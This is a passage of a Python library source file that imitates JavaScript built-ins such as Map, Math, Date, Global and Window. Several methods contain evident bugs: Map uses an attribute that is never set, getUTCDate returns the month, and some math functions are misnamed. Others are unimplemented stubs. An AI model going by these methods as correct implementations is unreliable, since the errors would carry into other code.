"""Returns the number of properties."""
return len(self.__dict__)
def __contains__(self, key):
"""[Returns whether the specified property exists.]
Args:
key ([str]): [The name of the property to check for.]
Returns:
[bool]: [True if the specified property exists. Otherwise, False.]
"""
return key in self.__dict__
def __getattr__(self, name):
"""[gets the value of the specified property]
Args:
name ([str]): [the name of the property]
Returns:
[str]: [the value of the specified property]
"""
return self.__getitem__(name)
def __setattr__(self, name, val):
"""[sets the value of the specified property]
Args:
name ([str]): [the name of the property]
val ([str]): [the value of the property]
Returns:
[str]: [the value of the property]
"""
return self.__setitem__(name, val)
def __delattr__(self, name):
"""[deletes the specified property]
Args:
name ([str]): [the name of the property]
Returns:
[type]: [the value of the property]
"""
return self.__delitem__(name)
# def __call__(self, *args, **kwargs):
# """ Calls the object. """
# return self.toString()
class Function(Object):
"""a Function object"""
def __init__(self, func, *args, **kwargs):
self.func = func
self.arguments = args
self.caller = None
self.displayName = None
self.length = None
self.name = None
# self.isCallable = True
# self.constructor = False
# self.__proto__ = None
def apply(self, thisArg=None, args=None, **kwargs):
"""[calls a function with a given this value, and arguments provided as an array]
Args:
thisArg ([type]): [The value of this provided for the call to func.]
Returns:
[type]: [result of calling the function.]
"""
if thisArg is not None:
try:
return self.func(args) # kwargs?
except TypeError:
return self.func()
try:
return self.func(*args)
except TypeError:
return self.func()
def bind(self, thisArg, *args, **kwargs):
"""[creates a new function that, when called,
has its this keyword set to the provided value,
with a given sequence of arguments preceding any provided when the new function is called.]
Args:
thisArg ([type]): [The value to be passed as the this parameter to the target
function func when the bound function is called.]
Returns:
[type]: [A copy of the given function with the specified this value, and initial arguments (if provided).]
"""
from functools import partial
bound_f = partial(self.func, *args, *kwargs)
return bound_f
# raise NotImplementedError
# @staticmethod
def call(self, thisArg=None, *args, **kwargs):
"""[calls a function with a given this value and arguments provided individually.]
Args:
thisArg ([type]): [description]
Returns:
[type]: [result of calling the function.]
"""
if thisArg is not None:
try:
return self.func(thisArg) # kwargs?
except TypeError as e:
print(e)
return self.func()
try:
return self.func(*args)
except TypeError:
return self.func()
def toString(self):
"""[Returns a string representing the source code of the function. Overrides the]"""
raise NotImplementedError
class Map:
"""Map holds key-value pairs and remembers the original insertion order of the keys."""
def __init__(self, collection):
"""[Pass a list or collection to make a Map object]
Args:
collection ([type]): [a list or dict]
"""
# parses the passed collectionn
if isinstance(collection, list):
# create a dict from the list
self.collection = dict(zip(collection, collection))
if isinstance(collection, dict):
# use the passed dict
self.collection = collection
else:
raise TypeError("Map requires a list or dict.")
self._data: dict = {}
self._order: list = []
def __contains__(self, key: str):
return key in self._dict
def __getitem__(self, key: str):
return self._dict[key]
def __setitem__(self, key: str, value):
if key not in self._dict:
self._order.append(key)
self._dict[key] = value
def __delitem__(self, key: str):
self._order.remove(key)
del self._dict[key]
def clear(self):
"""Removes all key-value pairs from the Map object."""
self._data = {}
self._order = []
def delete(self, key: str) -> bool:
"""Returns true if an element in the Map object existed and has been removed,
or false if the element does not exist. Map.prototype.has(key) will return false afterwards."""
try:
self._order.remove(key)
del self._dict[key]
return True
except Exception:
return False
def get(self, key: str, default=None):
"""Returns the value associated to the key, or undefined if there is none."""
return self._dict.get(key, default)
def has(self, key: str) -> bool:
"""Returns a boolean asserting whether a value has been associated to the key in the Map object or not."""
return key in self._dict
def set(self, key: str, value):
"""Sets the value for the key in the Map object. Returns the Map object."""
if key not in self._dict:
self._order.append(key)
self._dict[key] = value
return self
def iterkeys(self):
return iter(self._order)
def iteritems(self):
for key in self._order:
yield key, self._dict[key]
def keys(self):
"""Returns a new Iterator object that contains the keys
for each element in the Map object in insertion order."""
return list(self.iterkeys())
def values(self):
"""Returns a new Iterator object that contains the values
for each element in the Map object in insertion order."""
return list(self.iteritems())
def entries(self):
"""Returns a new Iterator object that contains an array of [key, value]
for each element in the Map object in insertion order."""
return [(x, self._dict[x]) for x in self._order]
# def forEach(self, callbackFn[, thisArg]):
# raise NotImplementedError
# TODO - is this supposed to pass count like Node list? i.e.
# for i in range(len(self.args)):
# func(self.args[i], i, self.args)
def update(self, ordered_dict):
for key, value in ordered_dict.iteritems():
self[key] = value
def __str__(self):
return str([(x, self._dict[x]) for x in self._order])
# TODO - moved to webapi.xhr . might import here for convenience?
# class FormData:
# """[utils for a form]
# Args:
# object ([str]): [takes a string or pyml object and returns a FormData]
# """
# def __init__(self, form):
# """ creates a new FormData object. """
# # TODO - parse to domonic.
# # if isinstance(form, str):
# # self._data = domonic.loads(form) # TODO - parser wont be done enough yet
# # if isinstance(form, Node):
# # self._data = form
# raise NotImplementedError
# def append(self, name, value, filename):
# """ Appends a new value onto an existing key inside a FormData object,
# or adds the key if it does not already exist. """
# raise NotImplementedError
# def delete(self, name):
# """ Deletes a key/value pair from a FormData object. """
# raise NotImplementedError
# def entries(self):
# """ Returns an iterator allowing to go through all key/value pairs contained in this object. """
# raise NotImplementedError
# def get(self, name):
# """ Returns the first value associated with a given key from within a FormData object. """
# raise NotImplementedError
# def getAll(self, name):
# """ Returns an array of all the values associated with a given key from within a FormData """
# raise NotImplementedError
# def has(self, name):
# """ Returns a boolean stating whether a FormData object contains a certain key."""
# raise NotImplementedError
# def keys(self):
# """ Returns an iterator allowing to go through all keys of the key/value pairs contained in this object."""
# raise NotImplementedError
# def set(self, name, value, filename):
# """ Sets a new value for an existing key inside a FormData object,
# or adds the key/value if it does not already exist."""
# raise NotImplementedError
# def values(self):
# """ Returns an iterator allowing to go through all values contained in this object."""
# raise NotImplementedError
class Worker:
"""[A background task that can be created via script, which can send messages back to its creator.
Creating a worker is done by calling the Worker("path/to/worker/script") constructor.]
TODO - JSWorker - Node
Args:
object ([str]): [takes a path to a python script]
"""
def __init__(self, script):
"""creates a new Worker object."""
raise NotImplementedError
def postMessage(self):
"""Sends a message โ consisting of any object โ to the worker's inner scope."""
raise NotImplementedError
def terminate(self):
"""Immediately terminates the worker. This does not let worker finish its operations; it is halted at once.
ServiceWorker instances do not support this method."""
raise NotImplementedError
class Math(Object):
"""Math class that mirrors javascript implementation.
i.e. you can pass strings and it will also work, Math.abs('-1')
"""
PI: float = 3.141592653589793
E: float = 2.718281828459045
LN2: float = 0.6931471805599453
LN10: float = 2.302585092994046
LOG2E: float = 1.4426950408889634
LOG10E: float = 0.4342944819032518
SQRT1_2: float = 0.7071067811865476
SQRT2: float = 1.4142135623730951
def _force_number(func):
"""[private decorator to make Math behave like javascript and turn strings, bools and None into numbers]]"""
def validation_decorator(*args, **kwargs):
params = list(args)
for i, n in enumerate(params):
if type(n) == list or type(n) == tuple:
if len(n) == 0:
params[i] = n = 0
elif len(n) == 1:
params[i] = n = n[0]
if type(n) == str:
if n == "":
params[i] = n = 0
continue
if n is None:
params[i] = 0
continue
if type(n) != float and type(n) != int:
try:
if "." in n:
params[i] = float(n)
else:
params[i] = int(n)
except Exception:
# raise ValueError("")
# js returns None instead
pass
args = tuple(params)
try:
return func(*args)
except Exception:
return None
return validation_decorator
@staticmethod
@_force_number
def abs(x: float) -> float:
"""[Returns the absolute value of a number.]
Args:
x ([float]): [number]
Returns:
[float]: [absolute value]
"""
return abs(x)
@staticmethod
@_force_number
def acos(x: float) -> float:
"""[Returns the arccosine (in radians) of a number.]
Args:
x ([float]): [number]
Returns:
[float]: [arccosine]
"""
return math.acos(x)
@staticmethod
@_force_number
def acosh(x: float) -> float:
"""Returns the hyperbolic arccosine of a number."""
return math.acosh(x)
@staticmethod
@_force_number
def asin(x: float) -> float:
"""Returns the arcsine (in radians) of a number."""
return math.asin(x)
@staticmethod
@_force_number
def asinh(x: float) -> float:
"""Returns the hyperbolic arcsine of a number."""
return math.asinh(x)
@staticmethod
@_force_number
def atan(x: float) -> float:
"""Returns the arctangent (in radians) of a number."""
return math.atan(x)
@staticmethod
@_force_number
def atan2(x: float, y: float) -> float:
"""Returns the arctangent of the quotient of its arguments."""
return math.atan2(x, y)
@staticmethod
@_force_number
def atanh(x: float) -> float:
"""Returns the hyperbolic arctangent of a number."""
return math.atanh(x)
@staticmethod
@_force_number
def cbrt(x: float) -> float:
"""Returns the cube root of a number."""
return math.cbrt(x)
@staticmethod
@_force_number
def ceil(x: float) -> float:
"""Returns the smallest integer greater than or equal to a number."""
return math.ceil(x)
@staticmethod
@_force_number
def cos(x: float) -> float:
"""Returns the cosine of a number. (x is in radians)"""
return math.cos(x)
@staticmethod
@_force_number
def cosh(x: float) -> float:
"""Returns the hyperbolic cosine of a number."""
return math.cosh(x)
@staticmethod
@_force_number
def exp(x: float) -> float:
"""Returns the value of E^x."""
return math.exp(x)
@staticmethod
@_force_number
def floor(x: float) -> float:
"""Returns the largest integer less than or equal to a number."""
return math.floor(x)
@staticmethod
@_force_number
def log(x: float, base: float = None) -> float:
"""Returns the natural logarithm (base E) of a number."""
if base is None:
return math.log(x)
else:
return math.log(x, base)
@staticmethod
@_force_number
def max(x: float, y: float) -> float:
"""Returns the largest of two numbers."""
return max(x, y)
@staticmethod
@_force_number
def min(x: float, y: float) -> float:
"""Returns the smallest of two numbers."""
return min(x, y)
@staticmethod
@_force_number
def random() -> float:
"""Returns a random number between 0 and 1."""
return random.random()
@staticmethod
@_force_number
def round(x: float) -> float:
"""Returns the value of a number rounded to its nearest integer."""
return round(x)
@staticmethod
@_force_number
def pow(x: float, y: float) -> float:
"""Returns the value of a number raised to a power."""
return math.pow(x, y)
@staticmethod
@_force_number
def sin(x: float) -> float:
"""Returns the sine of a number. (x is in radians)"""
return math.sin(x)
@staticmethod
@_force_number
def sinh(x: float) -> float:
"""Returns the hyperbolic sine of a number."""
return math.sinh(x)
@staticmethod
@_force_number
def sqrt(x: float) -> float:
"""Returns the square root of a number."""
return math.sqrt(x)
@staticmethod
@_force_number
def tan(x: float) -> float:
"""Returns the tangent of a number. (x is in radians)"""
return math.tan(x)
@staticmethod
@_force_number
def tanh(x: float) -> float:
"""Returns the hyperbolic tangent of a number."""
return math.tanh(x)
@staticmethod
@_force_number
def trunc(x: float) -> float:
"""Returns the integer part of a number."""
return math.trunc(x)
# TODO - test
@staticmethod
# @_force_number
def hypot(*args):
"""returns the square root of the sum of squares of its arguments"""
return math.hypot(*args)
# TODO - test
@staticmethod
# @_force_number
def log2(*args):
"""returns the square root of the sum of squares of its arguments"""
return math.log2(*args)
# TODO - test
@staticmethod
# @_force_number
def loglp(*args):
"""returns the natural logarithm (base e) of 1 + a number, that is"""
return math.loglp(*args)
# TODO - test
@staticmethod
@_force_number
def log10(x):
"""function returns the base 10 logarithm of a number, that is"""
return math.log10(x)
# TODO - test
@staticmethod
@_force_number
def fround(x):
"""returns the nearest 32-bit single precision float representation of a Number"""
# return math.log10(x)
raise NotImplementedError
# TODO - test
@staticmethod
@_force_number
def clz32(x):
"""returns the number of leading zero bits in the 32-bit binary representation of a number."""
raise NotImplementedError
# import urllib
class Global:
"""javascript global methods"""
NaN = "NaN"
Infinity = float("inf")
__timers = {}
# TODO - https://stackoverflow.com/questions/747641/what-is-the-difference-between-decodeuricomponent-and-decodeuri
@staticmethod
def decodeURI(x):
"""Decodes a URI"""
return unquote(x)
@staticmethod
def decodeURIComponent(x):
"""Decodes a URI component"""
return unquote(x, encoding="utf-8")
@staticmethod
def encodeURI(x):
"""Encodes a URI"""
return quote(str(x), safe="~@#$&()*!+=:;,.?/'")
@staticmethod
def encodeURIComponent(x):
"""Encodes a URI component"""
return quote(str(x), safe="~()*!.'")
# @staticmethod
# def escape():
""" Deprecated in version 1.5. Use encodeURI() or encodeURIComponent() """
# pass
@staticmethod
def eval(pythonstring):
"""Evaluates a string and executes it as if it was script code"""
eval(pythonstring)
@staticmethod
def isFinite(x) -> bool: # TODO - test
"""Returns true if x is a finite number"""
return math.isfinite(x)
@staticmethod
def isNaN(x):
"""Determines whether a value is an illegal number"""
try:
return math.isnan(x)
except TypeError:
return True
def NaN(self):
""" "Not-a-Number" value"""
# return self.NaN
return "NaN"
@staticmethod
def Number(x):
"""Converts an object's value to a number"""
try:
if type(x) == float or type(x) == int: # or type(x) == long:
return x
if type(x) == str:
if "." in x:
return float(x)
else:
return int(x)
except Exception:
return "NaN"
return "NaN"
@staticmethod
def Boolean(x): # TODO - test
if isinstance(x, int):
return bool(x)
elif isinstance(x, str):
if x.lower() == "true":
return True
elif x.lower() == "false":
return False
elif x == "":
return False
else:
return True
elif isinstance(x, bool):
return x
elif isinstance(x, (list, tuple, dict, object)):
return True
elif x is None:
return False
else:
return True
@staticmethod
def parseFloat(x: str):
"""Parses a string and returns a floating point number"""
# return float(x)
import ast
return float(ast.literal_eval(x))
@staticmethod
def parseInt(x: str):
"""Parses a string and returns an integer"""
# return int(x)
import ast
return int(ast.literal_eval(x))
@staticmethod
def String(x):
"""Converts an object's value to a string"""
return str(x)
def undefined(self):
"""Indicates that a variable has not been assigned a value"""
return None
# @staticmethod
# def unescape():
""" Deprecated in version 1.5. Use decodeURI() or decodeURIComponent() instead """
# pass
@staticmethod
def require(path: str):
"""Loads a script from a file"""
# '.'.join(path.split('/'))
# module = __import__(path) # app.components.{component}
# my_class = getattr(module, component.title())
# return my_class()
raise NotImplementedError
@staticmethod
def setTimeout(callback, t, *args, **kwargs):
"""[sets a timer which executes a function or evaluates an expression after a specified delay]
Args:
callback (function): [method to be executed after the delay]
t ([int]): [milliseconds]
Returns:
[str]: [an identifier for the timer]
"""
if isinstance(callback, str):
callback = eval(callback)
timer = threading.Timer(t / 1000, callback, args=args, kwargs=kwargs)
timer_id = id(timer)
Global.__timers[timer_id] = timer
timer.start()
return timer_id
@staticmethod
def clearTimeout(timeoutID):
"""[cancels a timer set with setTimeout()]
Args:
timeoutID ([str]): [the identifier returned by setTimeout()]
"""
Global.__timers.pop(timeoutID).cancel()
# NOTE - for globals use the class to make them but then register them here
decodeURI = Global.decodeURI
decodeURIComponent = Global.decodeURIComponent
encodeURI = Global.encodeURI
encodeURIComponent = Global.encodeURIComponent
parseFloat = Global.parseFloat
parseInt = Global.parseInt
setTimeout = Global.setTimeout
clearTimeout = Global.clearTimeout
class Performance:
_start = time.time()
def __init__(self):
pass
def now(self):
end = time.time()
return end - Performance._start
# def reset(self):
# Performance._start = time.time()
performance = Performance()
class Intl:
def __init__(self):
pass
@staticmethod
def getCanonicalLocales(locales):
"""Returns the canonicalized locales."""
if isinstance(locales, str):
locales = [locales]
for locale in locales:
if locale.find("-") != -1:
locale = locale.split("-")[0].lower() + "-" + locale.split("-")[1].upper()
elif locale.find("_") != -1:
locale = locale.split("_")[0].lower() + "_" + locale.split("_")[1].upper()
else:
locale = locale.lower()
return locales
@staticmethod
def supportedValuesOf(locales, property):
"""Returns a sorted array containing the supported unique calendar,
collation, currency, numbering systems, or unit values supported by the implementation."""
pass
class _Collator:
def __init__(self, locale):
self.locale = locale
print("Intl._Collator.__init__", locale)
Collator = _Collator
class _DateTimeFormat:
@staticmethod
def supportedLocalesOf():
raise NotImplementedError
DateTimeFormat = _DateTimeFormat
class _NumberFormat:
def __init__(self, locales, options):
pass
NumberFormat = _NumberFormat
class Date(Object):
"""javascript date"""
@staticmethod
def parse(date_string):
"""Parses a date string and returns the number of milliseconds since January 1, 1970"""
d = Date()
d.parse_date(str(date_string))
return int(d.date.timestamp() * 1000)
def __init__(self, date=None, *args, formatter="python", **kwargs):
"""A date object that tries to behave like the Javascript one.
TODO - js allowed dates are larger than pythons(mysql) datetime 99999 limit
TODO - also negative dates i.e. BC don't seem to be allowed with datetime
Args:
date (_type_, optional): _description_. Defaults to None.
formatter (str, optional): _description_. Defaults to 'python'.
"""
# join all the args on the date string
if len(args) > 0:
# parses dates passed in like: Date(1994, 12, 10)
if date is None:
date = ""
else:
date = str(date)
for arg in args:
date += " " + str(arg)
# print("date is:::::::::::::::::::::::::::::::::::::", date)
date = date.strip()
if date == "":
date = None
self.formatter = formatter
if isinstance(date, int):
self.date = datetime.datetime.fromtimestamp(date)
return
# elif isinstance(date, str):
# if formatter == 'python':
# self.date = datetime.datetime.strptime(date, '%Y-%m-%d %H:%M:%S')
# elif formatter == 'javascript':
# self.date = datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S.%fZ')
# else:
# raise ValueError('Invalid formatter')
if date is None:
self.date = datetime.datetime.now()
else:
self.date = self.parse_date(date)
def __str__(self):
return self.toString()
def toString(self):
"""Returns a string representation of the date"""
if self.formatter == "python":
return self.date.strftime("%Y-%m-%d %H:%M:%S")
else:
return self.date.strftime("%Y-%m-%dT%H:%M:%S.%fZ") # js
def parse_date(self, date_string):
class MyParserInfo(parserinfo):
def convertyear(self, year, *args, **kwargs):
# browser ticks over at approx 30 years (1950 when I check in chrome)
if year < 100 and year > 30:
year += 1900
return year
self.date = parse(date_string, MyParserInfo())
return self.date
def getDate(self):
"""Returns the day of the month (from 1-31)"""
return self.date.day
def getDay(self):
"""Returns the day of the week (from 0-6 : Sunday-Saturday)
Returns:
int: An integer number, between 0 and 6, corresponding to the day of the week for the given date,
according to local time: 0 for Sunday, 1 for Monday, 2 for Tuesday, and so on
"""
pyweekday = self.date.isoweekday()
return pyweekday if pyweekday < 6 else 0
def getFullYear(self):
"""Returns the year"""
return self.date.year
def getHours(self):
"""Returns the hour (from 0-23)"""
return self.date.hour
def getMilliseconds(self):
"""Returns the milliseconds (from 0-999)"""
return round(self.date.microsecond / 1000)
def getMinutes(self):
"""Returns the minutes (from 0-59)"""
return self.date.minute
def getMonth(self):
"""Returns the month (from 0-11)"""
return self.date.month - 1
def getSeconds(self):
"""Returns the seconds (from 0-59)"""
return self.date.second
def getTime(self):
"""Returns A number representing the milliseconds elapsed between 1 January 1970 00:00:00 UTC and self.date"""
epoch = datetime.datetime(1970, 1, 1)
self.date = self.date.replace(tzinfo=timezone.utc)
epoch = epoch.replace(tzinfo=timezone.utc)
return int((self.date - epoch).total_seconds() * 1000)
def getTimezoneOffset(self):
"""Returns the difference, in minutes, between a date as evaluated in the UTC time zone,
and the same date as evaluated in the local time zone"""
# return self.date.now().utcoffset().total_seconds() / 60 # TODO - TEST
# date1 = self.date.astimezone()
# date1.replace(tzinfo = timezone.utc)
# date2 = self.date.astimezone()
# date2.replace(tzinfo=timezone.utc)
raise NotImplementedError()
def getUTCDate(self):
"""Returns the day of the month, according to universal time (from 1-31)"""
return self.date.utcnow().month
def getUTCDay(self):
"""Returns the day of the week, according to universal time (from 0-6)"""
return self.date.utcnow().day
def getUTCFullYear(self):
"""Returns the year, according to universal time"""
return self.date.utcnow().year
def getUTCHours(self):
"""Returns the hour, according to universal time (from 0-23)"""
return self.date.utcnow().hour
def getUTCMilliseconds(self):
"""Returns the milliseconds, according to universal time (from 0-999)"""
return round(self.date.utcnow().microsecond / 1000)
def getUTCMinutes(self):
"""Returns the minutes, according to universal time (from 0-59)"""
return self.date.utcnow().minute
def getUTCMonth(self):
"""Returns the month, according to universal time (from 0-11)"""
return self.date.utcnow().month - 1
def getUTCSeconds(self):
"""Returns the seconds, according to universal time (from 0-59)"""
return self.date.utcnow().second
def getYear(self):
"""Deprecated. Use the getFullYear() method instead"""
return self.date.year
@staticmethod
def now():
"""Returns the number of milliseconds since midnight Jan 1, 1970"""
return round(time.time() * 1000)
def setDate(self, day: int):
"""Sets the day of the month of a date object
Args:
day (int): An integer representing the day of the month.
Returns:
int: milliseconds between epoch and updated date.
"""
days_in_the_month = lambda d: calendar.monthrange(d.year, d.month)[1]
while day < 0:
current_month = self.date.month
self.setMonth(current_month - 1)
day += days_in_the_month(self.date)
while day > days_in_the_month(self.date):
day -= days_in_the_month(self.date)
self.date = self.date.replace(day=int(1))
self.setMonth(self.month + 1)
if day > 0:
self.date = self.date.replace(day=int(day))
return self.getTime()
def setFullYear(self, yearValue: int, monthValue: int = None, dateValue: int = None):
"""Sets the year of a date object
Args:
yearValue (_type_): _description_
monthValue (int, optional): _description_. Defaults to None.
dateValue (int, optional): _description_. Defaults to None.
Returns:
int: milliseconds between epoch and updated date.
"""
self.date = self.date.replace(year=int(yearValue))
if monthValue is not None:
self.setMonth(monthValue)
if dateValue is not None:
self.setDate(dateValue)
return self.getTime()
def setHours(self, hoursValue: int, minutesValue: int = None, secondsValue: int = None, msValue: int = None):
"""Sets the hour of a date object
Args:
hoursValue (int): an integer between 0 and 23
minutesValue (int, optional): an integer between 0 and 59
secondsValue (int, optional): an integer between 0 and 59,
msValue (int, optional): a number between 0 and 999,
Returns:
int: milliseconds between epoch and updated date.
"""
while hoursValue > 23:
current_day = self.date.day
self.setDate(current_day + 1)
hoursValue -= 24
while hoursValue < 0:
current_day = self.date.day
self.setDate(current_day - 1)
hoursValue += 24
self.date = self.date.replace(hour=int(hoursValue))
if minutesValue is not None:
self.setMinutes(minutesValue)
if secondsValue is not None:
self.setSeconds(secondsValue)
if msValue is not None:
self.setMilliseconds(msValue)
return self.getTime()
def setMilliseconds(self, milliseconds: int):
"""Sets the milliseconds of a date object
Args:
milliseconds (int): Milliseconds to set i.e 123
"""
microseconds = int(milliseconds) * 1000
self.date = self.date.replace(microsecond=microseconds)
# return
def setMinutes(self, minutesValue: int, secondsValue: int = None, msValue: int = None):
"""Set the minutes of a date object
Args:
minutesValue (int, optional): an integer between 0 and 59
secondsValue (int, optional): an integer between 0 and 59,
msValue (int, optional): a number between 0 and 999,
Returns:
int: milliseconds between epoch and updated date.
"""
while minutesValue > 59:
current_hour = self.date.hour
self.setHours(current_hour + 1)
minutesValue -= 59
while minutesValue < 0:
current_hour = self.date.hour
self.setHours(current_hour - 1)
minutesValue += 60
self.date = self.date.replace(minute=int(minutesValue))
if secondsValue is not None:
self.setSeconds(secondsValue)
if msValue is not None:
self.setMilliseconds(msValue)
return self.getTime()
def setMonth(self, monthValue: int, dayValue: int = None): # -> int:
"""Sets the month of a date object
Args:
monthValue (int): a number from 0 to 11 indicating the month.
dayValue (int, optional): an optional day of the month. Defaults to 0.
Returns:
int: milliseconds between epoch and updated date.
"""
while monthValue < 0:
current_year = self.date.year
self.set_fullyear(current_year - 1)
monthValue += 11
while monthValue > 11:
current_year = self.date.year
self.set_fullyear(current_year + 1)
monthValue -= 12
if monthValue >= 0:
# if the new month is less days. it will affect the result. i.e
# js would progress to the next month and add the spare left over days
# So if the current day is 31st August 2016. and you setMonth(1), it would be 2nd March.
# as there's 29 days in February that year.
# in python it will error as the new month has less days.
# so we need to change it first.
next_month_total_days = calendar.monthrange(self.date.year, monthValue + 1)[1]
leftovers = next_month_total_days - self.getDate()
if leftovers < 0:
leftovers = abs(leftovers)
self.date = self.date.replace(day=int(leftovers)) # reset the day for now to not error
self.date = self.date.replace(month=int(monthValue + 1))
self.date = self.date.replace(day=leftovers)
else:
self.date = self.date.replace(month=int(monthValue + 1))
if dayValue is not None:
self.setDate(dayValue)
return self.getTime()
def setSeconds(self, secondsValue: int, msValue: int = None):
"""Sets the seconds of a date object
Args:
secondsValue (int): _description_
msValue (int, optional): _description_. Defaults to None.
Returns:
int: milliseconds between epoch and updated date.
"""
self.date = self.date.replace(second=int(secondsValue))
if msValue is not None:
self.setMilliseconds(msValue)
return self.getTime()
def setTime(self, milliseconds: int = None):
"""Sets the date and time of a date object
Args:
milliseconds (_type_, optional): _description_. Defaults to None.
Returns:
_type_: _description_
"""
if milliseconds is None:
self.date = datetime.datetime.now()
else:
self.date = datetime.datetime.fromtimestamp(milliseconds / 1000)
return milliseconds
def setUTCDate(self, day):
"""Sets the day of the month of a date object, according to universal time"""
self.setDate(day)
return self.getTime()
def setUTCFullYear(self, year):
"""Sets the year of a date object, according to universal time"""
self.setFullYear(year)
return self.getTime()
def setUTCHours(self, hour):
"""Sets the hour of a date object, according to universal time"""
self.setHours(hour)
return self.getTime()
def setUTCMilliseconds(self, milliseconds):
"""Sets the milliseconds of a date object, according to universal time"""
self.setMilliseconds(milliseconds)
return self.getTime()
def setUTCMinutes(self, minutes):
"""Set the minutes of a date object, according to universal time"""
self.setMinutes(minutes)
return self.getTime()
def setUTCMonth(self, month):
"""Sets the month of a date object, according to universal time"""
self.setMonth(month)
return self.getTime()
def setUTCSeconds(self, seconds):
"""Set the seconds of a date object, according to universal time"""
self.setSeconds(seconds)
return self.getTime()
def setYear(self, year):
"""Deprecated. Use the setFullYear() method instead"""
self.date.replace(year=int(year))
return self.getTime()
# TODO - there may not be a date object already?
def toDateString(self):
"""Converts the date portion of a Date object into a readable string"""
return self.date.strftime("%Y-%m-%d")
def toUTCString(self):
"""Converts a Date object to a string, according to universal time"""
return self.date.strftime("%Y-%m-%d %H:%M:%S")
def toGMTString(self):
"""Deprecated. Use the toUTCString() method instead"""
return self.toUTCString()
def toJSON(self):
"""Returns the date as a string, formatted as a JSON date"""
return json.dumps(self.date.strftime("%Y-%m-%d"))
def toISOString(self):
"""Returns the date as a string, using the ISO standard"""
return self.date.strftime("%Y-%m-%d")
def toLocaleDateString(self):
"""Returns the date portion of a Date object as a string, using locale conventions"""
return self.date.strftime("%x")
def toLocaleString(self):
"""Converts a Date object to a string, using locale conventions"""
return self.date.strftime("%x")
def toLocaleTimeString(self):
"""Returns the time portion of a Date object as a string, using locale conventions"""
return self.date.strftime("%X")
def toTimeString(self):
"""Converts the time portion of a Date object to a string"""
return self.date.strftime("%X")
def UTC(self):
"""Returns the number of milliseconds in a date since midnight of January 1, 1970, according to UTC time"""
return self.date.utcnow()
# TODO - add all dunders and test
# def __eq__(self, other):
# return self.date == other.date
# def __ne__(self, other):
# return self.date != other.date
# def __lt__(self, other):
# return self.date < other.date
# def __le__(self, other):
# return self.date <= other.date
# def __gt__(self, other):
# return self.date > other.date
# def __ge__(self, other):
# return self.date >= other.date
class Screen:
"""screen"""
# wrap a lib?
# https://github.com/rr-/screeninfo?
def __init__(self):
# from sys import platform
# if platform == "linux" or platform == "linux2":
# # linux
# import subprocess
# resuls = subprocess.Popen(['xrandr'],stdout=subprocess.PIPE).communicate()[0].split("current")[1].split(",")[0]
# width = resuls.split("x")[0].strip()
# heigth = resuls.split("x")[1].strip()
# print width + "x" + heigth
# elif platform == "darwin":
# # OS X
# results = str(subprocess.Popen(['system_profiler SPDisplaysDataType'],stdout=subprocess.PIPE, shell=True).communicate()[0])
# res = re.search('Resolution: \d* x \d*', results).group(0).split(' ')
# width, height = res[1], res[3]
# return width, height
# elif platform == "win32":
# from win32api import GetSystemMetrics
# print("Width =", GetSystemMetrics(0))
# print("Height =", GetSystemMetrics(1))
pass
def availHeight(self):
"""Returns the height of the screen (excluding the Windows Taskbar)"""
# return self.height
raise NotImplementedError
def availWidth(self):
"""Returns the width of the screen (excluding the Windows Taskbar)"""
raise NotImplementedError
def colorDepth(self):
"""Returns the colorDepth"""
raise NotImplementedError
def height(self):
"""Returns the total height of the screen"""
raise NotImplementedError
def pixelDepth(self):
"""Returns the pixelDepth"""
raise NotImplementedError
def width(self):
"""Returns the total width of the screen"""
raise NotImplementedError
class ProgramKilled(Exception):
pass
class Job(threading.Thread):
def __init__(self, interval, execute, *args, **kwargs):
threading.Thread.__init__(self)
self.daemon = False
self.stopped = threading.Event()
self.interval = interval
self.execute = execute
self.args = args
self.kwargs = kwargs
def stop(self):
self.stopped.set()
self.join()
def run(self):
while not self.stopped.wait(self.interval.total_seconds()):
self.execute(*self.args, **self.kwargs)
# def __str__(self):
# return "Job every %s" % self.interval
class SetInterval:
def signal_handler(self, signum, frame):
raise ProgramKilled
def __init__(self, function, time, *args, **kwargs):
signal.signal(signal.SIGTERM, self.signal_handler)
signal.signal(signal.SIGINT, self.signal_handler)
self.job = Job(datetime.timedelta(microseconds=time * 1000), function, *args, **kwargs)
self.job.start()
# def stop(self):
# self.job.stop()
class Promise:
# undocumented - warning. use at own risk
def __init__(self, func=None, *args, **kwargs):
# print('init')
self.data = None
self.state = "pending" # fullfilled, rejected
if func is not None:
func(self.resolve, self.reject)
def then(self, func):
if func is not None:
# print('--->',self.data)
self.data = func(self.data)
# print('-->',self.data)
return self
def catch(self, error):
# func(error)
print(error)
return self
def resolve(self, data):
# print( 'resolve called::', data )
self.data = data
self.state = "fulfilled"
return self
def reject(self, data):
self.data = data
self.state = "rejected"
return self
# def __str__(self):
# try:
# return self.data.text
# except Exception as e:
# print(e)
# return str(self)
class FetchedSet: # not a promise
def __init__(self, *args, **kwargs):
self.results = []
def __getitem__(self, index):
return self.results[index]
def oncomplete(self, func): # runs once all results are back
func(self.results)
return
# def __call__(self, func):
# self.results.append(func)
class Window:
"""window"""
localStorage = Storage()
location = "eventual.technology"
def __init__(self, *args, **kwargs):
# self.console = dom.console
# self.document = Document
# globals()?
# dir()?
# locals()?
pass
# TODO - tell users to use other window class if methods are called.
@staticmethod
def alert(msg):
"""Displays an alert box with a message and an OK button"""
print(msg)
return
@staticmethod
def prompt(msg, default_text=""):
"""Displays a dialog box that prompts the visitor for input"""
print(msg)
data = input()
return data
setTimeout = Global.setTimeout
clearTimeout = Global.clearTimeout
@staticmethod
def clearInterval(job):
job.stop()
@staticmethod
def setInterval(function, time, *args, **kwargs):
interval_ID = SetInterval(function, time, *args, **kwargs)
return interval_ID.job
@staticmethod
def _do_request(url, f=None, **kwargs):
# private - don't use directly. use one of the fetch methods
try:
# r = requests.get(url, timeout=3)
from requests import Request, Session
method = "GET"
if "method" in kwargs:
method = kwargs["method"]
if "callback_function" in kwargs:
del kwargs["callback_function"]
if "error_handler" in kwargs:
del kwargs["error_handler"]
s = Session()
req = Request(method, url)
prepped = s.prepare_request(req)
r = s.send(prepped, **kwargs)
# print(r.status_code)
s.close()
if f is not None and type(f) is FetchedSet:
f.results.append(r)
return r
except Exception as e:
print(f"Request Failed for URL: {url}", e)
return None
@staticmethod
def fetch(url: str, **kwargs):
# undocumented - warning. use at own risk
# note - kinda pointless atm. just use requests directly and you wont have to muck about with a Promise
if type(url) is not str:
raise ValueError("fetch takes a single url string. use fetch_set, fetch_threaded or fetch_pooled")
f = Promise()
